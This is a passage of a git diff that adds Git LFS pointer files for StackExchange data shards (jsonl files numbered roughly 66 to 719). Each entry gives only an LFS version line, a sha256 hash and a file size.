+oid sha256:a3d4235de8ac19db83e4b3d77de25eaf7b7dbe88692eec6ee73301950e9d7a69 +size 39423865 diff --git a/data/stackexchange/1-1/660_2289.jsonl b/data/stackexchange/1-1/660_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2299f47fd4905c7aeaa032bdb09c739a9ab7b095 --- /dev/null +++ b/data/stackexchange/1-1/660_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:48cbe73dac26c24dfaf03aa8c1c0e7e017a1c85dd6a9b63482387a036beb44ff +size 37104476 diff --git a/data/stackexchange/1-1/661_2289.jsonl b/data/stackexchange/1-1/661_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fff0598226b7278191ca90f1d8b0c8d657690848 --- /dev/null +++ b/data/stackexchange/1-1/661_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5d4bce8fb6c452b36dc7804176e34931111b513a31ba7997135e417e8c34e278 +size 36521666 diff --git a/data/stackexchange/1-1/662_2289.jsonl b/data/stackexchange/1-1/662_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..383564d0feff00c6c77f9d14b8ef65a6f8e3f3f3 --- /dev/null +++ b/data/stackexchange/1-1/662_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6cb3e38247d2ae0acc18b1139dbdfdce40283fe5df33ec0e73d7df166cf52ba4 +size 36584323 diff --git a/data/stackexchange/1-1/663_2289.jsonl b/data/stackexchange/1-1/663_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..226e68ceace0c71b58075ebe385d44a769627904 --- /dev/null +++ b/data/stackexchange/1-1/663_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f4c1d69de376ef64abc66320f8f37ae08260ff12363e46a6459c9b1c3198df02 +size 37259860 diff --git a/data/stackexchange/1-1/664_2289.jsonl b/data/stackexchange/1-1/664_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9768f303f5951f3e63fd0f0597ed2918d63320ba --- /dev/null +++ b/data/stackexchange/1-1/664_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4f9ee815a32b9146a53229df049c52d4f990961e8e11638e8a035e6f75ff5469 +size 37527044 diff --git a/data/stackexchange/1-1/665_2289.jsonl b/data/stackexchange/1-1/665_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0616a42c6d24a9fe0e684c91e81863aae5dabf26 --- /dev/null +++ b/data/stackexchange/1-1/665_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c111407a01fb02f0b2fd80bc7e8d4dbba906918a3394597ac2862a2a4e9f1cb1 +size 37089366 diff --git a/data/stackexchange/1-1/666_2289.jsonl b/data/stackexchange/1-1/666_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..16806e8b436ceff77cabcfef157bb7af4041572a --- /dev/null +++ b/data/stackexchange/1-1/666_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dcaa9db6b903658da75869e2e62628bf14f65dd04fbcddb11355c1c6a6cf7cf4 +size 36831710 diff --git a/data/stackexchange/1-1/667_2289.jsonl b/data/stackexchange/1-1/667_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..58cc2cb49ad640068466c83c57461c8d97c0bb5b --- /dev/null +++ b/data/stackexchange/1-1/667_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c7e23a3814a6cffa90528b3a654fc3acefb42521d0753c872fc3c0572cf6f656 +size 37618180 diff --git a/data/stackexchange/1-1/668_2289.jsonl b/data/stackexchange/1-1/668_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b0f33842634d01864b81e54230b2194ca61b4a06 --- /dev/null +++ b/data/stackexchange/1-1/668_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6e8a70ae578b2231a145781ad4f43206a596c4de6e0af56974613f832ce4e5f5 +size 36573808 diff --git a/data/stackexchange/1-1/669_2289.jsonl b/data/stackexchange/1-1/669_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8c9ef9b1ea12f52f8aaa39dce458c41a9ab180cb --- /dev/null +++ b/data/stackexchange/1-1/669_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f1e3138ec29494177a497ef6d8956ecc4e228f227fa57f487b1857a5a7c8a416 +size 36756721 diff --git a/data/stackexchange/1-1/66_2289.jsonl b/data/stackexchange/1-1/66_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..88151ac46d54db9d51909a7f0d4b8e05c1a54b2b --- /dev/null +++ b/data/stackexchange/1-1/66_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ebf62e5637a407b3f6abcf261d4770047419f68acffe9e41c6da3530db98b7ad +size 39925908 diff --git a/data/stackexchange/1-1/670_2289.jsonl b/data/stackexchange/1-1/670_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f3afad40d1940d3567ed4f98831c758accdcb6da --- /dev/null +++ b/data/stackexchange/1-1/670_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3009f6e3929b198bbdace6991ffd262b10752346ff73f52f61a3b0ac1ff69972 +size 37511816 diff --git a/data/stackexchange/1-1/671_2289.jsonl b/data/stackexchange/1-1/671_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c32443c80252676031e0aa5912d60ce67dc9d4b0 --- /dev/null +++ b/data/stackexchange/1-1/671_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4d4c6bf2ac684b7818bb5c454067a9379f949274f540fd5727db411c3d75881d +size 37065196 diff --git a/data/stackexchange/1-1/672_2289.jsonl b/data/stackexchange/1-1/672_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1ccdd2a3f043dd117b763dc7a21f07dfd01ed62e --- /dev/null +++ b/data/stackexchange/1-1/672_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a7d32b3a64c892fa22742d5a9b8b72cc187ca0c67e8b6587731cad1e033323d5 +size 36890496 diff --git a/data/stackexchange/1-1/673_2289.jsonl b/data/stackexchange/1-1/673_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2f0be91790cba23dc85897e6a67dabd745cd56a6 --- /dev/null +++ b/data/stackexchange/1-1/673_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a4313f74f4f4c77820e50b8448705efb942663dcd1fb502f44f6dbefbf1b49a7 +size 37599886 diff --git a/data/stackexchange/1-1/674_2289.jsonl b/data/stackexchange/1-1/674_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..abf6f5885649201d402d64cf14543743e9f935fe --- /dev/null +++ b/data/stackexchange/1-1/674_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2db240b5f91808429185bbd5220506fdde29e309ee7802fa84b8aca902375824 +size 37438651 diff --git a/data/stackexchange/1-1/675_2289.jsonl b/data/stackexchange/1-1/675_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..352e1d2b9633f1e73a27500f21662f93d0b6ef14 --- /dev/null +++ b/data/stackexchange/1-1/675_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:31cfeb75d3aa4deeca9208af833fd75eb99e62f1741b031efc4d498b8c989834 +size 37073664 diff --git a/data/stackexchange/1-1/676_2289.jsonl b/data/stackexchange/1-1/676_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cdc8161ac579a83760c086fc3100f9db0f493afc --- /dev/null +++ b/data/stackexchange/1-1/676_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1784955c447c64aaede9bd4aa798fee4524c8acc98f7ef98ab387c5a1608e298 +size 37016942 diff --git a/data/stackexchange/1-1/677_2289.jsonl b/data/stackexchange/1-1/677_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d8caefb340bb800c442163011793f72ae18c47ac --- /dev/null +++ b/data/stackexchange/1-1/677_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8e09b567bc34419b50b4bf8a18864cba0250eada400b5d7fc45cecd65629ab8c +size 37587011 diff --git a/data/stackexchange/1-1/678_2289.jsonl b/data/stackexchange/1-1/678_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a0ab69be7f07c9f5743782de60d113a2bf9bb979 --- /dev/null +++ b/data/stackexchange/1-1/678_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d676a8a00555d58b468e7a31c503e3070c0431e31a0ed79131e8c54b35add69f +size 37159815 diff --git a/data/stackexchange/1-1/679_2289.jsonl b/data/stackexchange/1-1/679_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8d41b0eba859d225cedadbb93dbacf0bace9e96f --- /dev/null +++ b/data/stackexchange/1-1/679_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c77bf06fe6a54da493d9606bf081cbf238e45820be2fe95a915fc7d4b0814b28 +size 37112994 diff --git a/data/stackexchange/1-1/67_2289.jsonl b/data/stackexchange/1-1/67_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..05013f8a00444658d75db1fabe377c949d356a27 --- /dev/null +++ b/data/stackexchange/1-1/67_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:205946040e4d4f7def129f2da0978528ba2882d18c517c743fc71bffa441cdf6 +size 39662372 diff --git a/data/stackexchange/1-1/680_2289.jsonl b/data/stackexchange/1-1/680_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..63d4f5493cb7b46919c57873b2580d2b8fa17bb8 --- /dev/null +++ b/data/stackexchange/1-1/680_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f070f9e9051de29ed7ca2bcaedeaeb848a58445521910b1a2322062dc5c0a6a6 +size 37536444 diff --git a/data/stackexchange/1-1/681_2289.jsonl b/data/stackexchange/1-1/681_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..32478ca876bdfd6f024692a1e2c51ca32c82d17a --- /dev/null +++ b/data/stackexchange/1-1/681_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bb30c7bef34abe456b2a6fa06504bad1dd1e0e622d73481e40ed333d0bebb061 +size 37184450 diff --git a/data/stackexchange/1-1/682_2289.jsonl b/data/stackexchange/1-1/682_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fb71e06e2b80dc10517788dea4069b4e539f3f59 --- /dev/null +++ b/data/stackexchange/1-1/682_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1ed63570b2da78b4e6e098f5c365d8b2a926746c99bc4a43f18bc9b370fd3a8b +size 36718120 diff --git a/data/stackexchange/1-1/683_2289.jsonl b/data/stackexchange/1-1/683_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2edb3f516d43ae012971786eb20f072a4a6671b1 --- /dev/null +++ b/data/stackexchange/1-1/683_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0322c58dae83cd98136107df249b4ce28fe6b267b56b52965998f0d7a8f80324 +size 36626167 diff --git a/data/stackexchange/1-1/684_2289.jsonl b/data/stackexchange/1-1/684_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..67887d540c4cd6fc92bd3f3fbf20ebb954a49b70 --- /dev/null +++ b/data/stackexchange/1-1/684_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:603fd37b388738fa9fa7632d4faef13d7b1eb2937ba8e727f164a13579de758a +size 37143454 diff --git a/data/stackexchange/1-1/685_2289.jsonl b/data/stackexchange/1-1/685_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d51cf4c3dbf10782ced6c1b9f8db1852afce7f2b --- /dev/null +++ b/data/stackexchange/1-1/685_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:228c6406b3715180fdb92f06f239099f81718b3958f823bb17be18e1dce2cd4d +size 37817472 diff --git a/data/stackexchange/1-1/686_2289.jsonl b/data/stackexchange/1-1/686_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..64dea318dafa5e55652c6f038aa68cf231c7002c --- /dev/null +++ b/data/stackexchange/1-1/686_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fbb5f50386e0a8f54b5eb2cd0aac2b3968fdd6edc234ff1016d483fb7fd7ff45 +size 36796135 diff --git a/data/stackexchange/1-1/687_2289.jsonl b/data/stackexchange/1-1/687_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9a9c1f133efbcd169c503c6d3c9ff57062933420 --- /dev/null +++ b/data/stackexchange/1-1/687_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:98d61db479b6dbf6a72f40dea2f56751055f99865f71bae89305ae83df708d60 +size 37299997 diff --git a/data/stackexchange/1-1/688_2289.jsonl b/data/stackexchange/1-1/688_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4ac2566e9abbb5978caca76ce79aa38023d92e88 --- /dev/null +++ b/data/stackexchange/1-1/688_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0f5cfbd68838291411fe1376d86f07c57b68e184a76e19364c4131e383f21149 +size 37024144 diff --git a/data/stackexchange/1-1/689_2289.jsonl b/data/stackexchange/1-1/689_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b3a2fa9c0a7f21a70821d9fcffaa0c5e774464d1 --- /dev/null +++ b/data/stackexchange/1-1/689_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e0cad5dfd51080c893db9cc150578e65fcc91dc387d372beb3097168aba4a122 +size 36858928 diff --git a/data/stackexchange/1-1/68_2289.jsonl b/data/stackexchange/1-1/68_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..04b4dba2bd6c53b42d0d2e81eb484d0573c26982 --- /dev/null +++ b/data/stackexchange/1-1/68_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b08aca7596cd8c1af373cf8fe5df36d8b37e79841016f7c8ac47940f5a9ce39c +size 39290320 diff --git a/data/stackexchange/1-1/690_2289.jsonl b/data/stackexchange/1-1/690_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b25cccb9f02ce1946ee5d909106fdd4fd5a73a3b --- /dev/null +++ b/data/stackexchange/1-1/690_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fc45b4f08d94690884e87d40ca6332e52f309fdd91aba0d6b120d0928abd6d7c +size 36941622 diff --git a/data/stackexchange/1-1/691_2289.jsonl b/data/stackexchange/1-1/691_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f40a43c186137f7e45a50bdc6920f125206a345f --- /dev/null +++ b/data/stackexchange/1-1/691_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:830c2a089524f5ec1108660274e219aa05c787228f7b4859ee103273b1de897b +size 37295970 diff --git a/data/stackexchange/1-1/692_2289.jsonl b/data/stackexchange/1-1/692_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..df7c05d94d2c96226711d422260697beac0a814c --- /dev/null +++ b/data/stackexchange/1-1/692_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f769337b3442470dc3384c3aa678b6b8a416a0dd9c42cffb760e65278ea1383f +size 37119382 diff --git a/data/stackexchange/1-1/693_2289.jsonl b/data/stackexchange/1-1/693_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e9583140b643afbb5da3ae48e9b89c45080e1835 --- /dev/null +++ b/data/stackexchange/1-1/693_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7dd394c2821aa5ca704be640f5485bdf62fba1b031037d20b07562392e08f310 +size 37087948 diff --git a/data/stackexchange/1-1/694_2289.jsonl b/data/stackexchange/1-1/694_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..54677c95ee04ef9d01df9282c45185ca6ea0a41a --- /dev/null +++ b/data/stackexchange/1-1/694_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:83efd1fa76e33dec3182e9be703db834bdd01c35def5cf06e7908d703ea5cdad +size 36961478 diff --git a/data/stackexchange/1-1/695_2289.jsonl b/data/stackexchange/1-1/695_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eff15e2687cab95f9d8f6e155b39649ff4e20c27 --- /dev/null +++ b/data/stackexchange/1-1/695_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:994aabd3ccd847f5dca937326cf9c9a719db631197772f903f7d97b4e7461f7c +size 36887898 diff --git a/data/stackexchange/1-1/696_2289.jsonl b/data/stackexchange/1-1/696_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2c4e5077f1a4c5893dacc52eaf327f2d5b082987 --- /dev/null +++ b/data/stackexchange/1-1/696_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7b4207023d36e3fe933695f911fb0ce5c551743828c55048345ede353d70abe5 +size 36723563 diff --git a/data/stackexchange/1-1/697_2289.jsonl b/data/stackexchange/1-1/697_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..96fbee85aa053a95616e77bf3d87a34b9b037027 --- /dev/null +++ b/data/stackexchange/1-1/697_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cac2670be225f69bda93a68fd6d4eb01f0b1f4f5a1f7732a52e81d173882a242 +size 37399058 diff --git a/data/stackexchange/1-1/698_2289.jsonl b/data/stackexchange/1-1/698_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2a43fbc0b3f5798c265cbc7a5e07d8d4d63e5b4d --- /dev/null +++ b/data/stackexchange/1-1/698_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d1b500e6d173d680453e12a0eeb6e07b9010164508f6ee5a5fed5bed00aa019a +size 36711788 diff --git a/data/stackexchange/1-1/699_2289.jsonl b/data/stackexchange/1-1/699_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aed41b43fcf9eaab06c0f09144ba0ea565944f94 --- /dev/null +++ b/data/stackexchange/1-1/699_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0a1d67fdc5d3a62f686343f77096fcf796127b91a9a43ac1060974e9d1056e9f +size 37521459 diff --git a/data/stackexchange/1-1/69_2289.jsonl b/data/stackexchange/1-1/69_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a9ec1e3f5593a82f2567ba7fe322a98bd56f1378 --- /dev/null +++ b/data/stackexchange/1-1/69_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:58b4d5b1112f1d2f0887789afa04fcc9eaa2d0d402e6eb9a9abba4dee30a9b43 +size 40093528 diff --git a/data/stackexchange/1-1/6_2289.jsonl b/data/stackexchange/1-1/6_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..21819946a1b8006870230195db1fabab86ab2cd0 --- /dev/null +++ b/data/stackexchange/1-1/6_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6ec4f7c87020207b73a3cba39db234df47ae7544a0ddfdfc5d8107d2494fe009 +size 36056270 diff --git a/data/stackexchange/1-1/700_2289.jsonl b/data/stackexchange/1-1/700_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6e9ad524dbecbd734aa53cd55f7bbde104989760 --- /dev/null +++ b/data/stackexchange/1-1/700_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d4fdc5cc4d5057d8a43a1a729947fe5dbdd91371d81ad495865c77b7db5ac060 +size 36334012 diff --git a/data/stackexchange/1-1/701_2289.jsonl b/data/stackexchange/1-1/701_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ba367942faf8db96fc69931f3ea419440319ff9f --- /dev/null +++ b/data/stackexchange/1-1/701_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:abb6148ab38dca08b8c808b2723bf6e267df37e0c79cbf7cba7b52c37adf0dc1 +size 35882700 diff --git a/data/stackexchange/1-1/702_2289.jsonl b/data/stackexchange/1-1/702_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ed468b0dcfad1166b05628c392b2e0255503252b --- /dev/null +++ b/data/stackexchange/1-1/702_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:097fcf602a82924564afb90ebef19aa00fb58af1f9da64dfe812f27079f273c6 +size 36843397 diff --git a/data/stackexchange/1-1/703_2289.jsonl b/data/stackexchange/1-1/703_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..586d7c13538a18cba93046eb43141722bbe49f8f --- /dev/null +++ b/data/stackexchange/1-1/703_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:06c927477f68bb77a36c2fd82666a29683947610c1e7fef9428c5c469c5c5d43 +size 36777826 diff --git a/data/stackexchange/1-1/704_2289.jsonl b/data/stackexchange/1-1/704_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..782fedacc16c70ad77b70e661dd0f93b5d3cad0d --- /dev/null +++ b/data/stackexchange/1-1/704_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9f079ded33e1c45986b7462ea0e8752b0c2e66bb1dba6dd700cc65c92f6b3a3e +size 36214206 diff --git a/data/stackexchange/1-1/705_2289.jsonl b/data/stackexchange/1-1/705_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bbf66979265ef5183184951388169bb643b3b7d5 --- /dev/null +++ b/data/stackexchange/1-1/705_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:abd9606cf5feaad8eda1e57b4b39da206a94aad6232279265377ea444f8cb1c4 +size 36184870 diff --git a/data/stackexchange/1-1/706_2289.jsonl b/data/stackexchange/1-1/706_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6dc280c9dc696fa58fe772fb1c265317ae41a854 --- /dev/null +++ b/data/stackexchange/1-1/706_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b26b13f1731bfb5694fa3294203c5d2abf233dee831eac08cab94406ad93d2a8 +size 36660505 diff --git a/data/stackexchange/1-1/707_2289.jsonl b/data/stackexchange/1-1/707_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c62f37cf0eee649a94f83f59fd333a19597f23be --- /dev/null +++ b/data/stackexchange/1-1/707_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:095c67482d52899aa76ab31e2ca7179c88a94d1efecaf603b2f60090dcbd9762 +size 37316903 diff --git a/data/stackexchange/1-1/708_2289.jsonl b/data/stackexchange/1-1/708_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3c063b5b898ff108681360326715db8d90a8bb8b --- /dev/null +++ b/data/stackexchange/1-1/708_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6242c1b0d8d43fbefe43a55e456ad4afaa3881a46d9b33572f3c2824d20f6f5f +size 36138682 diff --git a/data/stackexchange/1-1/709_2289.jsonl b/data/stackexchange/1-1/709_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6c24476d0a6b8c34153f1c1b7f973fdedbacd867 --- /dev/null +++ b/data/stackexchange/1-1/709_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e6942039d1f0569e05d483f1a8f20b26b207a81b9affc3390cb3bf6d42da75c7 +size 36307705 diff --git a/data/stackexchange/1-1/70_2289.jsonl b/data/stackexchange/1-1/70_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..98a75e410248fff8e74c66d04ba255db2be132a7 --- /dev/null +++ b/data/stackexchange/1-1/70_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:04ab040237658ad3f8d11c1213e65a31272c7457e360d4522132a94fd4075bca +size 39836999 diff --git a/data/stackexchange/1-1/710_2289.jsonl b/data/stackexchange/1-1/710_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f73264f7202c7ec052c5f39311dd2dfbc2774db6 --- /dev/null +++ b/data/stackexchange/1-1/710_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5fa6e1ba92cb4fd6fdb050b8b787c370249426ffe35f5e0bc6733948d26b0e05 +size 36111428 diff --git a/data/stackexchange/1-1/711_2289.jsonl b/data/stackexchange/1-1/711_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d0edb45b3de22632683cc28286234bd311e0531f --- /dev/null +++ b/data/stackexchange/1-1/711_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9012dd437d2ea6422a690ccd8d936c19dc3fca88a44cc568eadf7299452a13b1 +size 36384138 diff --git a/data/stackexchange/1-1/712_2289.jsonl b/data/stackexchange/1-1/712_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..83338323cb4ceaa40f525a5a5de2e7a6dd953856 --- /dev/null +++ b/data/stackexchange/1-1/712_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:30d96ede266483f3c38baaaf3c86db7e26a7f0ba8bd3341ace506f5cf5bb33e2 +size 37093705 diff --git a/data/stackexchange/1-1/713_2289.jsonl b/data/stackexchange/1-1/713_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c8a91f890ac4ba77c299d9091286b7ba7a764d76 --- /dev/null +++ b/data/stackexchange/1-1/713_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:51c44c18224456b99b6534e39bb122409e5427e487035a1695b4765d30046c27 +size 36457524 diff --git a/data/stackexchange/1-1/714_2289.jsonl b/data/stackexchange/1-1/714_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..72b95765947f3176839fc5181771753b04de7678 --- /dev/null +++ b/data/stackexchange/1-1/714_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c6ee39b1944e5d13e15bc857d94fe46dc0185401b6dd4bfc8fb1debf4765e07d +size 36464177 diff --git a/data/stackexchange/1-1/715_2289.jsonl b/data/stackexchange/1-1/715_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6c8288d9b03264f331a6cf3b3aac9cc40c54f22d --- /dev/null +++ b/data/stackexchange/1-1/715_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:532fa8c93aba9ac1c67d7c9edb0c7a26a9335f20c590bd53f8d7eca024e89979 +size 36607546 diff --git a/data/stackexchange/1-1/716_2289.jsonl b/data/stackexchange/1-1/716_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..76cb5cb5b3e1c1e74b9a238794f69c1200152982 --- /dev/null +++ b/data/stackexchange/1-1/716_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:41752ccf3c40ed1f49e6fb10817225d23b21c5f85cf66672451ebe32b9c210e2 +size 36272628 diff --git a/data/stackexchange/1-1/717_2289.jsonl b/data/stackexchange/1-1/717_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..56b877bf657461954e7474f04049cc09707d82d6 --- /dev/null +++ b/data/stackexchange/1-1/717_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b5e228c2214226c412047cf6a5b2726ce555e00206604603289b8bb332ae1aac +size 36644535 diff --git a/data/stackexchange/1-1/718_2289.jsonl b/data/stackexchange/1-1/718_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..67a94fa6d429a8778b29d7d017bbe48844f05794 --- /dev/null +++ b/data/stackexchange/1-1/718_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3e8e1eb2ec9291a763ab3ad543427c09c38ccaad1420b8f17bb0dcfe9b02d1f9 +size 36573452 diff --git a/data/stackexchange/1-1/719_2289.jsonl b/data/stackexchange/1-1/719_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f62b733a1a5c599986cadae12773c84a89294b4e --- /dev/null +++ b/data/stackexchange/1-1/719_2289.jsonl @@ -0,0 +1,3 @@ +version 